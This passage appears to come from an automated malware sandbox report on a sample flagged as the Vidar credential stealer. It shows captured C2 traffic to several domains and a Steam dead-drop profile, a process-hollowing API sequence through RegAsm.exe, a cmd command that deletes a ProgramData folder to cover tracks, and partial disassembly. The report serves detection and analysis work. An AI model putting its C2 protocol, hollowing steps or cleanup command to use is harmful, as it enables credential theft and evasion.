Data Ascii: aerror #D12
2024-10-03 07:16:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 49754 | 104.21.21.3 | 443 | 5388 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:50 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: mysterisop.site
2024-10-03 07:16:50 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-03 07:16:51 UTC | 768 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:51 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=dm38t17dnm8ukhrvqq416pu4th; expires=Mon, 27 Jan 2025 01:03:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dm3OPE9xN4OIDvp%2FqQl8G9VCCw0BtMVFc3nJKKFfmCjC775Uko2zYqXJIbjaUtvpPhXqaRj%2BYeyfEfX5k7cucUA0gMlhNIaLhHv9tZSJH9%2F8bMNNW1ctVIzobHU3w3i32IQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb262a284ec329-EWR
2024-10-03 07:16:51 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-03 07:16:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 49755 | 104.21.17.174 | 443 | 5388 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:51 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: absorptioniw.site
2024-10-03 07:16:51 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-03 07:16:52 UTC | 776 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:52 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=c4tc726fji3qkl87pf6knuvmcf; expires=Mon, 27 Jan 2025 01:03:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gT1xo6qeKZT6dE4cVLM1Ro18l%2BgavLjH4tRKPegKT5JNoh8LEUeuAEqYCTgDEPFaxQisC1Z3OnfpHjpirFPiMjht0%2Fpawlt%2BFJdTly4zCSJbaGwEIkT%2Fo95vRiv8HeHMybrxJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb2630aab64307-EWR
2024-10-03 07:16:52 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-03 07:16:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 49756 | 104.102.49.254 | 443 | 5388 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:53 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Host: steamcommunity.com
2024-10-03 07:16:53 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:53 GMT
                                                                                                                                                      Content-Length: 34837
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: sessionid=524cec9b07958f3e40c10b70; Path=/; Secure; SameSite=None
                                                                                                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-03 07:16:53 UTC | 14514 | IN
                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-03 07:16:53 UTC | 16384 | IN
                                                                                                                                                      Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-03 07:16:53 UTC | 3768 | IN
                                                                                                                                                      Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-03 07:16:53 UTC | 171 | IN
                                                                                                                                                      Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 49757 | 104.21.16.12 | 443 | 5388 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:54 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: gravvitywio.store
2024-10-03 07:16:54 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                      Data Ascii: act=life
2024-10-03 07:16:54 UTC | 780 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:54 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=gjsf2rjagode809eh5nbehc1ko; expires=Mon, 27 Jan 2025 01:03:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1SwkNNMGsafBh8TTQNtlVjTuyzUmDXzHUJ%2FefoLzAfFR2riDiykf86PllD6HXMyXsbSuPmvaOCAFV6QHLwFbwWRmaIBpZNqCKC%2FcRsJ2eO%2B%2FNXmhFp%2BZNiQqZZ9HRwXsqEx%2FbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb2640b93b43cd-EWR
2024-10-03 07:16:54 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                      Data Ascii: aerror #D12
2024-10-03 07:16:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0



                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:03:15:41
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                      Imagebase:0xeb0000
                                                                                                                                                      File size:423'840 bytes
                                                                                                                                                      MD5 hash:7B5E8E3DB2CE9C97F6A8214A4CCD3872
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:1
                                                                                                                                                      Start time:03:15:41
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:03:15:41
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                      Imagebase:0xcd0000
                                                                                                                                                      File size:65'440 bytes
                                                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:7
                                                                                                                                                      Start time:03:16:43
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\ProgramData\ECBKKKFHCF.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\ProgramData\ECBKKKFHCF.exe"
                                                                                                                                                      Imagebase:0xdd0000
                                                                                                                                                      File size:391'072 bytes
                                                                                                                                                      MD5 hash:BE9E376D9BAB656B145A7C8316636903
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 34%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:8
                                                                                                                                                      Start time:03:16:43
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:9
                                                                                                                                                      Start time:03:16:43
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                      Imagebase:0x1e0000
                                                                                                                                                      File size:65'440 bytes
                                                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:10
                                                                                                                                                      Start time:03:16:43
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                      Imagebase:0x5d0000
                                                                                                                                                      File size:65'440 bytes
                                                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:11
                                                                                                                                                      Start time:03:16:47
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJJKKJJDAAAA" & exit
                                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:12
                                                                                                                                                      Start time:03:16:47
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:13
                                                                                                                                                      Start time:03:16:47
                                                                                                                                                      Start date:03/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:timeout /t 10
                                                                                                                                                      Imagebase:0x880000
                                                                                                                                                      File size:25'088 bytes
                                                                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true


                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:28.8%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                        Signature Coverage:30%
                                                                                                                                                        Total number of Nodes:20
                                                                                                                                                        Total number of Limit Nodes:0

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,031920AB,0319209B), ref: 031922A8
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 031922BB
                                                                                                                                                        • Wow64GetThreadContext.KERNEL32(000003D4,00000000), ref: 031922D9
                                                                                                                                                        • ReadProcessMemory.KERNELBASE(000003D8,?,031920EF,00000004,00000000), ref: 031922FD
                                                                                                                                                        • VirtualAllocEx.KERNELBASE(000003D8,?,?,00003000,00000040), ref: 03192328
                                                                                                                                                        • WriteProcessMemory.KERNELBASE(000003D8,00000000,?,?,00000000,?), ref: 03192380
                                                                                                                                                        • WriteProcessMemory.KERNELBASE(000003D8,00400000,?,?,00000000,?,00000028), ref: 031923CB
                                                                                                                                                        • WriteProcessMemory.KERNELBASE(000003D8,-00000008,?,00000004,00000000), ref: 03192409
                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(000003D4,06080000), ref: 03192445
                                                                                                                                                        • ResumeThread.KERNELBASE(000003D4), ref: 03192454
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2143139534.0000000003191000.00000040.00000800.00020000.00000000.sdmp, Offset: 03191000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_3191000_file.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                        • API String ID: 2687962208-1257834847
                                                                                                                                                        • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                        • Instruction ID: 03d98bdc350091a6e8a533290a8bce1636db70575720ad1f8f34ea4ef2397fd1
                                                                                                                                                        • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                        • Instruction Fuzzy Hash: A5B1F67660024AAFDB60CF68CC80BDA73A9FF8C714F158565EA0CAB341D774FA518B94

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 01881598
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2143005704.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1880000_file.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                        • Opcode ID: 10f3dcd6e004bdbb0be9648ebb87198b5941d4bab56ee6f04bc450bdc9e87810
                                                                                                                                                        • Instruction ID: 0d25987d627f3c516b127f920e877b65e7f9fb052280fa55af171d49d2376f46
                                                                                                                                                        • Opcode Fuzzy Hash: 10f3dcd6e004bdbb0be9648ebb87198b5941d4bab56ee6f04bc450bdc9e87810
                                                                                                                                                        • Instruction Fuzzy Hash: 6B2104B58002499FDB10DFAAC885ADEFBF4FF48310F14841AE919A7250C7759911CFA5

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 01881598
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2143005704.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1880000_file.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                        • Opcode ID: e35539e5781e5327196a3b14b8dfb6b3312ace61fa3fe241a9e7bc482b2ffab3
                                                                                                                                                        • Instruction ID: e55c6c8227e6543e20410e29cc2bc67035a47a61e9d4d9e5b7902cd1bf2e27a5
                                                                                                                                                        • Opcode Fuzzy Hash: e35539e5781e5327196a3b14b8dfb6b3312ace61fa3fe241a9e7bc482b2ffab3
                                                                                                                                                        • Instruction Fuzzy Hash: 0A2113B18002499FDB10DFAAC880ADEFBF4FF48310F10842AE919A7250C775A910CFA5

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2142792448.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_17ed000_file.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3e384bc7a791dfb1daff3e6c0562f16a7d178c7e6aa7b95802ea3f38eaf22df8
                                                                                                                                                        • Instruction ID: 6b6a4e284f793ce65703e257e8213bf3577bdf75cb442c45b6468cd91752a13c
                                                                                                                                                        • Opcode Fuzzy Hash: 3e384bc7a791dfb1daff3e6c0562f16a7d178c7e6aa7b95802ea3f38eaf22df8
                                                                                                                                                        • Instruction Fuzzy Hash: C701F7315053449AE7309AA9CD88B67FFD8EF492A4F1C855AED490E182C279D442C6B1

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2142792448.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_17ed000_file.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c423d9d0082aec6c59e63c013245507be41417c77185c98472e8b3c9ef7b15b4
                                                                                                                                                        • Instruction ID: a03076fdab75dc6051b277a997fccae29b9eb17d05ebacc26496ea9e1a42c318
                                                                                                                                                        • Opcode Fuzzy Hash: c423d9d0082aec6c59e63c013245507be41417c77185c98472e8b3c9ef7b15b4
                                                                                                                                                        • Instruction Fuzzy Hash: 98F0F071005344AEF7208E1ACCC8B63FFD8EB85678F28C55AED480F286C3799841CAB1

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:4.3%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                        Signature Coverage:4.6%
                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                        Total number of Limit Nodes:30
86802->86803 86804 4047e8 3 API calls 86803->86804 86805 402c93 86804->86805 86806 4047e8 3 API calls 86805->86806 86807 402caa 86806->86807 86808 4047e8 3 API calls 86807->86808 86809 402cc1 86808->86809 86810 4047e8 3 API calls 86809->86810 86811 402cd8 86810->86811 86812 4047e8 3 API calls 86811->86812 86813 402cf2 86812->86813 86814 4047e8 3 API calls 86813->86814 86815 402d09 86814->86815 86816 4047e8 3 API calls 86815->86816 86817 402d20 86816->86817 86818 4047e8 3 API calls 86817->86818 86819 402d37 86818->86819 86820 4047e8 3 API calls 86819->86820 86821 402d4e 86820->86821 86822 4047e8 3 API calls 86821->86822 86823 402d65 86822->86823 86824 4047e8 3 API calls 86823->86824 86825 402d7c 86824->86825 86826 4047e8 3 API calls 86825->86826 86827 402d92 86826->86827 86828 4047e8 3 API calls 86827->86828 86829 402dac 86828->86829 86830 4047e8 3 API calls 86829->86830 86831 402dc3 86830->86831 86832 4047e8 3 API calls 86831->86832 86833 402dda 86832->86833 86834 4047e8 3 API calls 86833->86834 86835 402df1 86834->86835 86836 4047e8 3 API calls 86835->86836 86837 402e07 86836->86837 86838 4047e8 3 API calls 86837->86838 86839 402e1e 86838->86839 86840 4047e8 3 API calls 86839->86840 86841 402e35 86840->86841 86842 4047e8 3 API calls 86841->86842 86843 402e4c 86842->86843 86844 4047e8 3 API calls 86843->86844 86845 402e66 86844->86845 86846 4047e8 3 API calls 86845->86846 86847 402e7d 86846->86847 86848 4047e8 3 API calls 86847->86848 86849 402e94 86848->86849 86850 4047e8 3 API calls 86849->86850 86851 402eaa 86850->86851 86852 4047e8 3 API calls 86851->86852 86853 402ec1 86852->86853 86854 4047e8 3 API calls 86853->86854 86855 402ed8 86854->86855 86856 4047e8 3 API calls 86855->86856 86857 402eec 86856->86857 86858 4047e8 3 API calls 86857->86858 86859 402f03 86858->86859 86860 418643 86859->86860 87360 41859a GetPEB 86860->87360 86862 418649 86863 418844 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 86862->86863 86864 418659 86862->86864 86865 
